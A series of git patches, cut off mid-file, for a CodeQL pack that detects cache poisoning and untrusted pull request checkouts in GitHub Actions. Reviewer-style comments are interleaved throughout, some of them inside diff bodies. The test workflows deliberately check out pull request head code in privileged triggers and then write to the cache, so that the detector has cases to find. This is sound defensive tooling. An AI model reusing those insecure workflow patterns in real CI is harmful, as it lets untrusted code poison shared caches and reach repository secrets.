- // Owner: All characters must be either a hyphen (-) or alphanumeric
- // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point
- "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name
- "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name
- "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo
- ]
- |
- Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
- )
-}
-
+// bindingset[context]
+// private predicate repoNameEvent(string context) {
+// exists(string reg |
+// reg =
+// [
+// // repo name
+// // Owner: All characters must be either a hyphen (-) or alphanumeric
+// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point
+// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name
+// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name
+// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo
+// ]
+// |
+// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
+// )
+// }
 bindingset[context]
 private predicate branchEvent(string context) {
 exists(string reg |
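Review bot: The `repoNameEvent` predicate is kept as a 16-line commented-out block instead of being deleted, and the added lines start with `// bindingset[context]`, which reads like a live annotation at a glance. Version control already preserves the old text, so deleting it outright is the clearer option; if the source is meant to return once repo names are modelled, a single line such as `// TODO: workflow_run head_repository name/full_name are not modelled as sources (owner/repo names are restricted to [A-Za-z0-9_.-])` keeps the rationale, which the commented code currently leaves implicit. The removed blank line also leaves the commented block touching the `bindingset[context]` of `branchEvent`, so a separator would help readability.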
From bb028e41d49899955ebf3e834f4bd126b4a35763 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 17:10:34 +0200
Subject: [PATCH 231/707] Add Cache Poisoning Query
---
 .../actions/security/CachePoisoningQuery.qll | 55 +++++++++++++++++++
 ql/src/Security/CWE-349/CachePoisoning.ql | 36 ++++++++++++
 .../CWE-349/.github/workflows/test1.yml | 22 ++++++++
 .../CWE-349/.github/workflows/test2.yml | 17 ++++++
 .../CWE-349/.github/workflows/test3.yml | 21 +++++++
 .../CWE-349/.github/workflows/test4.yml | 17 ++++++
 .../Security/CWE-349/CachePoisoning.expected | 3 +
 .../Security/CWE-349/CachePoisoning.qlref | 2 +
 8 files changed, 173 insertions(+)
 create mode 100644 ql/lib/codeql/actions/security/CachePoisoningQuery.qll
 create mode 100644 ql/src/Security/CWE-349/CachePoisoning.ql
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
 create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref
diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
new file mode 100644
index 000000000000..a9a28227957c
--- /dev/null
+++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
@@ -0,0 +1,55 @@
+import actions
+
+abstract class CacheWritingStep extends Step { }
+
+class CacheActionUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionUsesStep() { this.getCallee() = "actions/cache" }
+}
+
+class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" }
+}
+
+class SetupJavaUsesStep extends CacheWritingStep, UsesStep {
+ SetupJavaUsesStep() {
+ this.getCallee() = "actions/setup-java" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupGoUsesStep extends CacheWritingStep, UsesStep {
+ SetupGoUsesStep() { this.getCallee() = "actions/setup-go" }
+}
+
+class SetupNodeUsesStep extends CacheWritingStep, UsesStep {
+ SetupNodeUsesStep() {
+ this.getCallee() = "actions/setup-node" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupPythonUsesStep extends CacheWritingStep, UsesStep {
+ SetupPythonUsesStep() {
+ this.getCallee() = "actions/setup-python" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupDotnetUsesStep extends CacheWritingStep, UsesStep {
+ SetupDotnetUsesStep() {
+ this.getCallee() = "actions/setup-dotnet" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
new file mode 100644
index 000000000000..b3a9267703f8
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
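Review bot: `CacheWritingStep` and its seven subclasses carry no QLDoc, and the abstract class is the extension point the query (and presumably future queries) rely on. A header such as `/** A step that writes to the Actions cache: actions/cache, actions/cache/save, or a setup-* action with caching enabled. */` on the abstract class, plus one line per subclass naming the input that turns caching on (e.g. `/** actions/setup-node with `cache` or `cache-dependency-path` set. */`), would make the model reviewable. `SetupGoUsesStep` also matches every `actions/setup-go` use, unlike the java/node/python/dotnet siblings that require a `cache` or `cache-dependency-path` input; if setup-go caches by default that should be stated in a comment, otherwise the class needs the same guard.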
@@ -0,0 +1,36 @@
+/**
+ * @name Cache Poisoning
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/cache-poisoning
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.CachePoisoningQuery
+
+from Workflow w, PRHeadCheckoutStep checkout, LocalJob j
+where
+ // TODO: (require to collect trigger types)
+ // - add push to default branch?
+ // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch
+ w.hasTriggerEvent([
+ "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum",
+ "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column",
+ "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule",
+ "watch", "workflow_run"
+ ]) and
+ // Workflow is privileged
+ w.isPrivileged() and
+ // The workflow checkouts untrusted code from a pull request
+ j = w.getAJob() and
+ j.getAStep() = checkout and
+ // The checkout step is followed by a cache writing step
+ j.getAStep() instanceof CacheWritingStep
+select checkout, "Potential cache poisoning on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml
new file mode 100644
index 000000000000..75e03886d48e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml
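Review bot: The comment `// The checkout step is followed by a cache writing step` does not describe the condition under it, `j.getAStep() instanceof CacheWritingStep`, which only requires that some step of the same job writes the cache, in any order; either reword it to `// The same job also contains a cache writing step` or constrain the order with `checkout.getAFollowingStep() instanceof CacheWritingStep`. The `@description` is circular (`The cache can be poisoned by untrusted code, leading to a cache poisoning attack.`); a sentence like `A privileged workflow checks out untrusted pull request code and then writes to the Actions cache, so cache entries shared with the default branch can be poisoned.` states the actual risk. The alert is placed on `checkout` while the message is about the cache write, so naming the cache-writing step in the message (or selecting it) would make results easier to triage.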
@@ -0,0 +1,22 @@
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+
+ - uses: actions/checkout@v3
+ if: success()
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_sha }}
+
+ - uses: actions/cache@v2
+ with:
+ path: ./poison
+ key: poison_key
+ - run: |
+ cat poison
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml
new file mode 100644
index 000000000000..6a6595d929ee
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml
@@ -0,0 +1,17 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/cache@v2
+ with:
+ path: ./poison
+ key: poison_key
+ - run: |
+ cat poison
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml
new file mode 100644
index 000000000000..2c684b6a02d5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml
@@ -0,0 +1,21 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/setup-java@v2
+ with:
+ distribution: 'zulu'
+ java-version: '21'
+ cache: 'gradle'
+ cache-dependency-path: |
+ sub-project/*.gradle*
+ sub-project/**/gradle-wrapper.properties
+ - run: |
+ java HelloWorldApp.java
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml
new file mode 100644
index 000000000000..b5ea127ebd32
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml
@@ -0,0 +1,17 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/setup-java@v2
+ with:
+ distribution: 'zulu'
+ java-version: '21'
+ - run: |
+ java HelloWorldApp.java
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
new file mode 100644
index 000000000000..e767e2f86222
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -0,0 +1,3 @@
+| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref
new file mode 100644
index 000000000000..2cbd05800e68
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref
@@ -0,0 +1,2 @@
+Security/CWE-349/CachePoisoning.ql
+
From 9417e1d164835cf59d9bcb6b73466e43ec58112e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 17:13:00 +0200
Subject: [PATCH 232/707] Classify checkout steps
---
 .../codeql/actions/dataflow/FlowSources.qll | 4 +-
 .../security/UntrustedCheckoutQuery.qll | 23 +++++++---
 ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 -------------------
 .../CWE-829/UntrustedCheckoutError.md | 0
 .../CWE-829/UntrustedCheckoutWarning.md | 0
 5 files changed, 19 insertions(+), 52 deletions(-)
 delete mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md
 delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.md
 delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index a97dc8405f49..580fb1d25ab1 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -113,8 +113,8 @@ private predicate branchEvent(string context) {
 "github\\.event\\.pull_request\\.head\\.repo\\.default_branch",
 "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref",
 "github\\.event\\.workflow_run\\.head_branch",
-"github\\.event\\.workflow_run\\.head_branch",
 "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref",
+"github\\.event\\.merge_group\\.head_ref",
 ]
 |
 Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
@@ -146,6 +146,7 @@ private predicate emailEvent(string context) {
 "github\\.event\\.head_commit\\.committer\\.email",
 "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email",
 "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email",
+"github\\.event\\.merge_group\\.committer\\.email",
 "github\\.event\\.workflow_run\\.head_commit\\.author\\.email",
 "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email",
 ]
@@ -165,6 +166,7 @@ private predicate usernameEvent(string context) {
 "github\\.event\\.head_commit\\.committer\\.name",
 "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name",
 "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name",
+"github\\.event\\.merge_group\\.committer\\.name",
 "github\\.event\\.workflow_run\\.head_commit\\.author\\.name",
 "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name",
 ]
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index c677915f504c..10a45830324e 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
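Review bot: The new `"github\\.event\\.merge_group\\.head_ref"` source in `branchEvent` is added without a comment on which part of the value is attacker-controlled, and the commit message ("Classify checkout steps") does not mention the source changes at all. As far as I can tell the merge-queue head ref is a GitHub-generated `gh-readonly-queue/<base>/pr-<n>-<sha>` name whose only variable part is the base branch, so this entry may cost precision rather than add coverage; the same question applies to the `merge_group.committer.email` / `.name` entries in the next two hunks, where the committer of a merge-queue commit is normally GitHub itself. A one-line comment per entry such as `// merge_group: head_ref embeds the target branch name` (or a note that the value is included on purpose as a conservative choice) would let reviewers judge it. The removal of the duplicated `workflow_run.head_branch` line is a good cleanup and needs no further change.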
@@ -40,6 +40,8 @@ predicate containsHeadSHA(string s) {
 "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
 "\\bgithub\\.event\\.check_run\\.head_sha\\b",
 "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+"\\bgithub\\.event\\.merge_group\\.head_sha\\b",
+"\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b",
 // heuristics
 "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b"
 ], _, _)
@@ -56,6 +58,7 @@ predicate containsHeadRef(string s) {
 "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
 "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
 "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+"\\bgithub\\.event\\.merge_group\\.head_ref\\b",
 // heuristics
 "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b",
 // env vars
@@ -64,11 +67,17 @@ predicate containsHeadRef(string s) {
 )
 }
 
-/** Checkout of a Pull Request HEAD ref */
+/** Checkout of a Pull Request HEAD */
 abstract class PRHeadCheckoutStep extends Step { }
 
+/** Checkout of a Pull Request HEAD ref */
+abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { }
+
+/** Checkout of a Pull Request HEAD ref */
+abstract class SHACheckoutStep extends PRHeadCheckoutStep { }
+
 /** Checkout of a Pull Request HEAD ref using actions/checkout action */
-class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep {
+class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep {
 ActionsMutableRefCheckout() {
 this.getCallee() = "actions/checkout" and
 (
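Review bot: The QLDoc added for `SHACheckoutStep` reads `/** Checkout of a Pull Request HEAD ref */`, identical to the doc on `MutableRefCheckoutStep` just above it, which defeats the point of splitting the hierarchy into mutable-ref and SHA checkouts; it should say `/** Checkout of a Pull Request HEAD commit SHA */`. The same stale "HEAD ref" wording remains on `ActionsSHACheckout`, `GitSHACheckout` and `GhSHACheckout` in the following hunks of this file, which now extend `SHACheckoutStep`, so those three doc comments deserve the same correction. Since the distinction is what lets a query treat a pinned SHA checkout as lower risk than a branch checkout, a sentence on `PRHeadCheckoutStep` explaining why the two subclasses differ (a branch name can be re-pushed after review, a SHA cannot) would help readers of the abstract class.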
@@ -102,7 +111,7 @@ class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep {
 }
 
 /** Checkout of a Pull Request HEAD ref using actions/checkout action */
-class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep {
+class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 ActionsSHACheckout() {
 this.getCallee() = "actions/checkout" and
 (
@@ -132,7 +141,7 @@ class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep {
 }
 
 /** Checkout of a Pull Request HEAD ref using git within a Run step */
-class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
 GitMutableRefCheckout() {
 exists(string line |
 this.getScript().splitAt("\n") = line and
@@ -154,7 +163,7 @@ class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
 }
 
 /** Checkout of a Pull Request HEAD ref using git within a Run step */
-class GitSHACheckout extends PRHeadCheckoutStep instanceof Run {
+class GitSHACheckout extends SHACheckoutStep instanceof Run {
 GitSHACheckout() {
 exists(string line |
 this.getScript().splitAt("\n") = line and
@@ -173,7 +182,7 @@ class GitSHACheckout extends PRHeadCheckoutStep instanceof Run {
 }
 
 /** Checkout of a Pull Request HEAD ref using gh within a Run step */
-class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
 GhMutableRefCheckout() {
 exists(string line |
 this.getScript().splitAt("\n") = line and
@@ -194,7 +203,7 @@ class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
 }
 
 /** Checkout of a Pull Request HEAD ref using gh within a Run step */
-class GhSHACheckout extends PRHeadCheckoutStep instanceof Run {
+class GhSHACheckout extends SHACheckoutStep instanceof Run {
 GhSHACheckout() {
 exists(string line |
 this.getScript().splitAt("\n") = line and
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
deleted file mode 100644
index 855773e6a31b..000000000000
--- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Unpinned tag for 3rd party Action in workflow
-
-The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions."
-
-## Recommendation
-
-Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
-
-## Example
-
-In this example, the Actions workflow uses an unpinned version.
-
-```yaml
-name: "Unpinned Action Example"
-
-jobs:
- build:
- steps:
- - name: Checkout repository
- uses: actions-third-party-mirror/checkout@v3
-
- - run: |
- ./build.sh
-```
-
-The Action is pinned in the example below.
-
-```yaml
-name: "Pinned Action Example"
-
-jobs:
- build:
- steps:
- - name: Checkout repository
- uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c
-
- - run: |
- ./build.sh
-```
-
-## References
-
- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md
deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md
deleted file mode 100644
index e69de29bb2d1..000000000000
From 2359e2de90d6a7adafca2ec16dfc849e3e0a7fe7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 17:24:43 +0200
Subject: [PATCH 233/707] Clean query
---
 ql/src/Security/CWE-349/CachePoisoning.ql | 27 +++++++++----------
 .../Security/CWE-349/CachePoisoning.expected | 6 ++---
 2 files changed, 16 insertions(+), 17 deletions(-)
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index b3a9267703f8..ac51e58ff4b0 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
@@ -15,22 +15,21 @@ import actions
 import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.CachePoisoningQuery
 
-from Workflow w, PRHeadCheckoutStep checkout, LocalJob j
+from LocalJob j
 where
+ // The workflow runs in the context of the default branch
 // TODO: (require to collect trigger types)
 // - add push to default branch?
 // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch
- w.hasTriggerEvent([
- "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum",
- "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column",
- "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule",
- "watch", "workflow_run"
- ]) and
- // Workflow is privileged
- w.isPrivileged() and
- // The workflow checkouts untrusted code from a pull request
- j = w.getAJob() and
- j.getAStep() = checkout and
- // The checkout step is followed by a cache writing step
+ j.getEnclosingWorkflow()
+ .hasTriggerEvent([
+ "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork",
+ "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card",
+ "project_column", "public", "pull_request_comment", "pull_request_target",
+ "repository_dispatch", "schedule", "watch", "workflow_run"
+ ]) and
+ // The job checkouts untrusted code from a pull request
+ j.getAStep() instanceof PRHeadCheckoutStep and
+ // The job writes to the cache
 j.getAStep() instanceof CacheWritingStep
-select checkout, "Potential cache poisoning on privileged workflow."
+select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index e767e2f86222..b791a440a6ef 100644
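Review bot: The `w.isPrivileged()` condition is dropped in this hunk, yet the alert message still reads `"Potential cache poisoning on privileged workflow."`, and the new comment `// The workflow runs in the context of the default branch` describes a trigger-list check rather than a privilege check. If the intent is that every listed trigger runs with default-branch context, and therefore any cache written there is served to every other branch, the comment should say that, e.g. `// Triggers that run on the default branch, so a cache entry written here is shared with all other refs`; otherwise the word `privileged` should leave the message. The TODO above it already notes that `pull_request_target` with a restricted `branches` filter is a known exception, so this is the place to record it.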
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -1,3 +1,3 @@
-| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. |
-| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. |
-| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. |
+| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. |
From f6b1daa59c7e872797c1486486258d23c7a3f2db Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 18:26:58 +0200
Subject: [PATCH 234/707] Improve query
---
 .../actions/security/CachePoisoningQuery.qll | 11 +++++++++--
 ql/src/Security/CWE-349/CachePoisoning.ql | 16 ++++++++++++----
 .../CWE-349/.github/workflows/test5.yml | 17 +++++++++++++++++
 .../CWE-349/.github/workflows/test6.yml | 17 +++++++++++++++++
 .../CWE-349/.github/workflows/test7.yml | 16 ++++++++++++++++
 .../Security/CWE-349/CachePoisoning.expected | 2 ++
 6 files changed, 73 insertions(+), 6 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml
diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
index a9a28227957c..6668ef9777d6 100644
--- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
@@ -21,7 +21,14 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep {
 }
 class SetupGoUsesStep extends CacheWritingStep, UsesStep {
- SetupGoUsesStep() { this.getCallee() = "actions/setup-go" }
+ SetupGoUsesStep() {
+ this.getCallee() = "actions/setup-go" and
+ (
+ not exists(this.getArgument("cache"))
+ or
+ this.getArgument("cache") = "true"
+ )
+ }
 }
 class SetupNodeUsesStep extends CacheWritingStep, UsesStep {
@@ -48,7 +55,7 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep {
 SetupDotnetUsesStep() {
 this.getCallee() = "actions/setup-dotnet" and
 (
- exists(this.getArgument("cache")) or
+ this.getArgument("cache") = "true" or
 exists(this.getArgument("cache-dependency-path"))
 )
 }
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index ac51e58ff4b0..e0d59a02ab49 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
@@ -14,8 +14,9 @@
 import actions
 import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.CachePoisoningQuery
+import codeql.actions.security.PoisonableSteps
-from LocalJob j
+from LocalJob j, PRHeadCheckoutStep checkout
 where
 // The workflow runs in the context of the default branch
 // TODO: (require to collect trigger types)
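Review bot: `SetupGoUsesStep` now counts the step as cache-writing only when the `cache` input is absent or exactly the literal `"true"`, so a value such as `cache: True` or an expression like `cache: ${{ inputs.cache }}` (depending on how `getArgument` normalises YAML scalars) is silently classified as non-caching and the alert disappears. Since the new test7 expectation confirms that setup-go caches when the input is absent, the conservative predicate is to exclude only an explicit opt-out: `SetupGoUsesStep() { this.getCallee() = "actions/setup-go" and not this.getArgument("cache") = "false" }`. The `SetupDotnetUsesStep` hunk below introduces the same exact-literal comparison; what that action does when `cache` is absent is not visible here, so the same change may or may not be right there.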
@@ -29,7 +30,14 @@ where
 "repository_dispatch", "schedule", "watch", "workflow_run"
 ]) and
 // The job checkouts untrusted code from a pull request
- j.getAStep() instanceof PRHeadCheckoutStep and
- // The job writes to the cache
- j.getAStep() instanceof CacheWritingStep
+ j.getAStep() = checkout and
+ (
+ // The job writes to the cache
+ // (No need to follow the checkout step as the cache writing is normally done after the job completes)
+ j.getAStep() instanceof CacheWritingStep
+ or
+ // The job executes checked-out code
+ // (The cache specific token can be leaked even for non-privileged workflows)
+ checkout.getAFollowingStep() instanceof PoisonableStep
+ )
 select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml
new file mode 100644
index 000000000000..9bc6cc980562
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml
@@ -0,0 +1,17 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/setup-go@v2
+ with:
+ go-version-file: 'go.mod'
+ cache: false
+ - run: do some go stuff
+
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml
new file mode 100644
index 000000000000..b5ef835210bc
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml
@@ -0,0 +1,17 @@
+name: Cache Poisoning
+
+on: pull_request_target
+
+jobs:
+ poison:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/setup-go@v2
+ with:
